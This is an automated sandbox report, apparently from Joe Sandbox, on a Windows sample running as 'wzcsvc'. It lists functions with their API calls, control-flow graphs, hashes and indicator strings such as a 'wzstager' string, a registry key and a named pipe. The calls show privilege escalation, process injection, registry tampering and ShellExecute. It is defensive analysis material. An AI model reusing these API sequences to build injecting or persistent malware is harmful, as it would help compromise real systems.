                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$CloseHandleOpenWow64
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 10462204-0
                                                                                                                                                                                                                                                • Opcode ID: a364114f00c1aada9da54b572579da955c0b2e56b3f767a9c4da04bc3a71f90e
                                                                                                                                                                                                                                                • Instruction ID: 10aabf48c2999601ed1c4b8b5add87e8a3a9f61022b5908137e2fcf5a4637f07
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a364114f00c1aada9da54b572579da955c0b2e56b3f767a9c4da04bc3a71f90e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05F01D21B0978292EB54AF5AA584169A6A1EF88FC0F449039EF8D93799DF3CD8858700
                                                                                                                                                                                                                                                Function 00007FF6B5AD2250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD2264: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD2287
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD2264: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD2297
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD2264: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD22B1
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD2264: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6B5AD22C8
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD2264: AdjustTokenPrivileges.KERNELBASE ref: 00007FF6B5AD2300
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD2264: GetLastError.KERNEL32 ref: 00007FF6B5AD230A
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD2264: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD2313
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD2264: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD2327
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD2264: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD233E
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD2264: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD2357
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD2264: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD2369
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD2264: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5AD2259), ref: 00007FF6B5AD2376
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD2264: RegCreateKeyExW.KERNELBASE ref: 00007FF6B5AD23B6
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD2264: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF6B5AD23DD
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD2264: RegSetKeySecurity.KERNELBASE ref: 00007FF6B5AD23F6
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6B5AD2264: LocalFree.KERNEL32 ref: 00007FF6B5AD2400
                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00007FF6B5AD225B
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3836936051-0
                                                                                                                                                                                                                                                • Opcode ID: bf254cb3d6035b2809951b42138fc99801fe68d3c2285e852756cdf8c8977066
                                                                                                                                                                                                                                                • Instruction ID: d4b2fadd4055060485bd2ae96c8f9e83044fc3cf0aba4f1224a978f1de234743
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf254cb3d6035b2809951b42138fc99801fe68d3c2285e852756cdf8c8977066
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BA01100E8A28382EE0833B8082A0A800A02FA0E02F000030EA8AA22CBCC2C2802C200
                                                                                                                                                                                                                                                Function 0000023EB69F2750 Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 181 23eb69f2750-23eb69f27b8 call 23eb69f29e8 * 4 190 23eb69f29c6 181->190 191 23eb69f27be-23eb69f27c1 181->191 193 23eb69f29c8-23eb69f29e4 190->193 191->190 192 23eb69f27c7-23eb69f27ca 191->192 192->190 194 23eb69f27d0-23eb69f27d3 192->194 194->190 195 23eb69f27d9-23eb69f27fa VirtualAlloc 194->195 195->190 196 23eb69f2800-23eb69f2820 195->196 197 23eb69f284c-23eb69f2853 196->197 198 23eb69f2822-23eb69f284a 196->198 199 23eb69f2859-23eb69f2866 197->199 200 23eb69f28f3-23eb69f28fa 197->200 198->197 198->198 199->200 203 23eb69f286c-23eb69f287e 199->203 201 23eb69f29a6-23eb69f29c4 200->201 202 23eb69f2900-23eb69f2915 200->202 201->193 202->201 204 23eb69f291b 202->204 210 23eb69f2880-23eb69f288c 203->210 211 23eb69f28de-23eb69f28e6 203->211 206 23eb69f2921-23eb69f2935 204->206 208 23eb69f2937-23eb69f2948 206->208 209 23eb69f2996-23eb69f29a0 206->209 214 23eb69f294a-23eb69f2951 208->214 215 23eb69f2953-23eb69f2957 208->215 209->201 209->206 216 23eb69f28d9-23eb69f28dc 210->216 211->203 212 23eb69f28e8-23eb69f28ed 211->212 212->200 218 23eb69f2984-23eb69f2994 214->218 219 23eb69f2959-23eb69f295f 215->219 220 23eb69f2961-23eb69f2965 215->220 216->211 217 23eb69f288e-23eb69f2891 216->217 221 23eb69f28bb-23eb69f28cb 217->221 222 23eb69f2893-23eb69f28b9 217->222 218->208 218->209 219->218 223 23eb69f2977-23eb69f297b 220->223 224 23eb69f2967-23eb69f2975 220->224 225 23eb69f28ce-23eb69f28d5 221->225 222->225 223->218 226 23eb69f297d-23eb69f2980 223->226 224->218 225->216 226->218
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2625982952.0000023EB69F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023EB69F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_23eb69f0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                                                                                • Instruction ID: d034c1b7f9d3ed927d250609444b3989583c838a356e782962ea814e96f1b213
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F6136B2B0169087DF568F95D20876DF393FB44B98F5A8120CE99077C8DA3CE9A6C700

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 00007FF6B5AD2558 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 236 7ff6b5ad2558-7ff6b5ad2584 237 7ff6b5ad2732-7ff6b5ad273a 236->237 238 7ff6b5ad258a 236->238 239 7ff6b5ad2740-7ff6b5ad2743 237->239 240 7ff6b5ad2976-7ff6b5ad299a ReadFile 237->240 241 7ff6b5ad26be-7ff6b5ad26f6 GetProcessHeap HeapAlloc K32EnumProcesses 238->241 242 7ff6b5ad2590-7ff6b5ad2597 238->242 243 7ff6b5ad296c-7ff6b5ad2971 call 7ff6b5ad1754 239->243 244 7ff6b5ad2749-7ff6b5ad274e 239->244 245 7ff6b5ad29a0-7ff6b5ad29a7 240->245 246 7ff6b5ad2a6c-7ff6b5ad2a86 240->246 241->246 247 7ff6b5ad26fc-7ff6b5ad270d 241->247 248 7ff6b5ad26b5-7ff6b5ad26b7 ExitProcess 242->248 249 7ff6b5ad259d-7ff6b5ad25a0 242->249 243->246 251 7ff6b5ad2754-7ff6b5ad2757 244->251 252 7ff6b5ad2911-7ff6b5ad2924 call 7ff6b5ad193c 244->252 245->246 253 7ff6b5ad29ad-7ff6b5ad29c1 call 7ff6b5ad18a4 245->253 247->246 254 7ff6b5ad2713-7ff6b5ad272b call 7ff6b5ad10c0 247->254 255 7ff6b5ad25a6-7ff6b5ad25a9 249->255 256 7ff6b5ad2658-7ff6b5ad2683 RegOpenKeyExW 249->256 260 7ff6b5ad2795-7ff6b5ad27a6 call 7ff6b5ad193c 251->260 261 7ff6b5ad2759-7ff6b5ad275e 251->261 252->246 280 7ff6b5ad292a-7ff6b5ad2939 call 7ff6b5ad193c 252->280 253->246 278 7ff6b5ad29c7-7ff6b5ad29cd 253->278 281 7ff6b5ad272d 254->281 257 7ff6b5ad25af-7ff6b5ad25b2 255->257 258 7ff6b5ad2649-7ff6b5ad2653 255->258 265 7ff6b5ad2685-7ff6b5ad2693 RegDeleteValueW 256->265 266 7ff6b5ad2699-7ff6b5ad26b0 call 7ff6b5ad19bc call 7ff6b5ad1754 call 7ff6b5ad1000 call 7ff6b5ad17e4 256->266 267 7ff6b5ad263c-7ff6b5ad2644 257->267 268 7ff6b5ad25b8-7ff6b5ad25bd 257->268 258->246 260->246 287 7ff6b5ad27ac-7ff6b5ad27ce ReadFile 260->287 261->246 270 7ff6b5ad2764-7ff6b5ad278e call 7ff6b5ad2174 call 7ff6b5ad21a0 ExitProcess 261->270 265->266 266->246 267->246 268->246 275 7ff6b5ad25c3-7ff6b5ad25e7 ReadFile 268->275 275->246 282 7ff6b5ad25ed-7ff6b5ad25f4 275->282 285 7ff6b5ad29d3-7ff6b5ad2a0e GetProcessHeap HeapAlloc call 7ff6b5ad14d0 278->285 286 7ff6b5ad2a57 278->286 280->246 296 7ff6b5ad293f-7ff6b5ad2967 ShellExecuteW 280->296 281->246 282->246 290 7ff6b5ad25fa-7ff6b5ad260e call 7ff6b5ad18a4 282->290 307 7ff6b5ad2a10-7ff6b5ad2a16 285->307 308 7ff6b5ad2a41-7ff6b5ad2a47 GetProcessHeap 285->308 293 7ff6b5ad2a5e-7ff6b5ad2a67 call 7ff6b5ad2a88 286->293 287->246 295 7ff6b5ad27d4-7ff6b5ad27db 287->295 290->246 311 7ff6b5ad2614-7ff6b5ad261a 290->311 293->246 295->246 302 7ff6b5ad27e1-7ff6b5ad281f GetProcessHeap HeapAlloc ReadFile 295->302 296->246 303 7ff6b5ad2903-7ff6b5ad290c GetProcessHeap 302->303 304 7ff6b5ad2825-7ff6b5ad2831 302->304 310 7ff6b5ad2a4a-7ff6b5ad2a55 HeapFree 303->310 304->303 309 7ff6b5ad2837-7ff6b5ad2843 304->309 307->308 313 7ff6b5ad2a18-7ff6b5ad2a2a 307->313 308->310 309->303 316 7ff6b5ad2849-7ff6b5ad2854 309->316 310->246 317 7ff6b5ad2630-7ff6b5ad2637 311->317 318 7ff6b5ad261c-7ff6b5ad262b call 7ff6b5ad10c0 311->318 314 7ff6b5ad2a30-7ff6b5ad2a38 313->314 315 7ff6b5ad2a2c-7ff6b5ad2a2e 313->315 314->313 321 7ff6b5ad2a3a 314->321 315->314 320 7ff6b5ad2a3c call 7ff6b5ad16c4 315->320 322 7ff6b5ad2856-7ff6b5ad2861 316->322 323 7ff6b5ad2879-7ff6b5ad28fd lstrlenW GetProcessHeap HeapAlloc call 7ff6b5ad2a88 GetProcessHeap HeapFree 316->323 317->293 318->246 320->308 321->308 322->303 326 7ff6b5ad2867-7ff6b5ad2874 call 7ff6b5ad1c80 322->326 323->303 326->303
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                                                                                                                                                                                                • String ID: SOFTWARE$open$wzstager
                                                                                                                                                                                                                                                • API String ID: 3276259517-3134961751
                                                                                                                                                                                                                                                • Opcode ID: 49469aca107eb5ab870f52516a22f9f595ae3c61a78ca066b1bbf4a06be3a02f
                                                                                                                                                                                                                                                • Instruction ID: 93f8551bf88162958c06c2d29f64e6b9fcf63c1b0ab250b3a4e0bcc51623b37c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49469aca107eb5ab870f52516a22f9f595ae3c61a78ca066b1bbf4a06be3a02f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17D15022A486839AEB75BB29A8142F92255FF44F45F400035EF5DA76DEDF3CEA05C350
                                                                                                                                                                                                                                                Function 00007FF6B5AD1C80 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                • API String ID: 3462610200-2766056989
                                                                                                                                                                                                                                                • Opcode ID: 5db55b7394678a523aa1a13404522c9923ae6185104554760f49e4175cea031b
                                                                                                                                                                                                                                                • Instruction ID: 6f243df4c04e2677fabe01a1d0ba50b4a3794f482ff072f1616d8b03f592359b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5db55b7394678a523aa1a13404522c9923ae6185104554760f49e4175cea031b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F517D32B04A0186EB50AF6AE8406AA7BE1FF48F98F054135DF4DA3799DF38E845C740
                                                                                                                                                                                                                                                Function 00007FF6B5AD19BC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                                                                                                                                                • String ID: wzsvc64
                                                                                                                                                                                                                                                • API String ID: 4184240511-201681562
                                                                                                                                                                                                                                                • Opcode ID: 8a8b947f24d0d56437289385b4e6c0331e53443c1448a47b68ed515fcd0cf7b9
                                                                                                                                                                                                                                                • Instruction ID: 5e84a2efa83f31e73d3c169ffd951760d4a2e628b33d923bcc0f0a0944a26dbd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a8b947f24d0d56437289385b4e6c0331e53443c1448a47b68ed515fcd0cf7b9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC416D32B44A8296E710EF29E4442E977B1FF94F88F044176EF0D92A59DF38E545C300
                                                                                                                                                                                                                                                Function 0000023EB69F9EF0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2625982952.0000023EB69F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023EB69F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_23eb69f0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction ID: 9197c928365cf863f540a31c229b95b7d1b5b9020eb05a8b2cf1002d673fdf48
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BFD1ACB2600B40CAEF669F25D48839DF7A2F74579CF160215EEC957B96CB38E689C700
                                                                                                                                                                                                                                                Function 0000023EB69F6920 Relevance: 12.2, APIs: 8, Instructions: 228COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2625982952.0000023EB69F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023EB69F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_23eb69f0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: 4befa6624efbf7b254a5279965bced147a12e1d24b670849b9ecf10f29bc47a4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7981C1F170030186FE52AB65A449369E7E3BB8578CF578435AA84877D6DE3CEB4D8700
                                                                                                                                                                                                                                                Function 00007FF6B5AD1000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Delete$CloseEnumOpen
                                                                                                                                                                                                                                                • String ID: SOFTWARE\wzconfig
                                                                                                                                                                                                                                                • API String ID: 3013565938-1049453983
                                                                                                                                                                                                                                                • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                                                                                                                                                                                • Instruction ID: 7598b9ac51f76ca44db2155b02d0fe1fd0538bada8c41f8ff4f3bf642c5e0bed
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A119422B18A8581EB60AB29E8457F92364FF44B54F404236DB4D569DDDF3CD648CB04
                                                                                                                                                                                                                                                Function 00007FF6B5AD2A88 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2636655240.00007FF6B5AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B5AD0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2635977479.00007FF6B5AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2637440154.00007FF6B5AD3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000004.00000002.2638219056.00007FF6B5AD6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff6b5ad0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$Write$CloseCreateHandle
                                                                                                                                                                                                                                                • String ID: \\.\pipe\wzcontrol_redirect64
                                                                                                                                                                                                                                                • API String ID: 148219782-2060006620
                                                                                                                                                                                                                                                • Opcode ID: b34fa02d577d28533ff0f18363391e30420b242850f6df86d4af65e84bfebd5f
                                                                                                                                                                                                                                                • Instruction ID: aa49c314e4efe2cec32addac6e7efeb9102e938dfce7e7597d0e3ed21814621c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b34fa02d577d28533ff0f18363391e30420b242850f6df86d4af65e84bfebd5f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF114C76A54B5182EB00AB19E4083A96760FF89FA4F444236DF1953BD9CF7CD945C740
                                                                                                                                                                                                                                                Function 0000023EB6A03A74 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2625982952.0000023EB69F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023EB69F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_23eb69f0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: 724e57d8392e03278ad55cc1aaf51137ac53dac1d61b8a551a9619dd5e2750f9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12110AB7710A03C5FE573169D85E3699047BF5937CF2B0220A576062EADA6D4B5D4108
                                                                                                                                                                                                                                                Function 0000023EB69FA770 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2625982952.0000023EB69F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000023EB69F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_23eb69f0000_wzcsvc.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: b32016a61711c77bc97f6b3041893effd280fdb1dbc5385f79a9c4307122662d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
